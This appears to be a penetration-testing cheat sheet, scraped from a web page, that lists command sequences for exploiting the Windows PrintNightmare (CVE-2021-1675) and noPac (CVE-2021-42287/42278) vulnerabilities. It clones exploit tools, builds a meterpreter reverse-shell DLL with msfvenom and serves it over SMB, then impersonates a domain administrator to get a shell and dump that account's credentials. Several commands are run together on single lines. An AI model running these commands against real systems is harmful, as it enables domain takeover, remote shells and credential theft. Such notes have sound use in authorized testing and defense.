Known Vulnerabilities
PrintNightmare (CVE-2021-1675)
git clone https://github.com/cube0x0/CVE-2021-1675.gitpip3 uninstall impacket
git clone https://github.com/cube0x0/impacket
cd impacket
python3 ./setup.py installrpcdump.py @IP | egrep 'MS-RPRN|MS-PAR'msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=IP LPORT=XXXX-f dll > backupscript.dllsudo smbserver.py -smb2support CompData /path/to/payloadDll/msf> use exploit/multi/handlerSamAccountNAme / nopac (CVE-2021-42287 / CVE-2021-42278)
git clone https://github.com/Ridter/noPac.gitsudo python3 scanner.py domain/user:password -dc-ip <dc-ip> -use-ldapsudo python3 noPac.py domain/user:password -dc-ip <dc-ip> -dc-host <dc-hostname> -shell --impersonate administrator -use-ldapsudo python3 noPac.py domain/user:password -dc-ip <dc-ip> -dc-host <dc-hostname> --impersonate administrator -use-ldap -dump -just-dc-user domain/administratorLast updated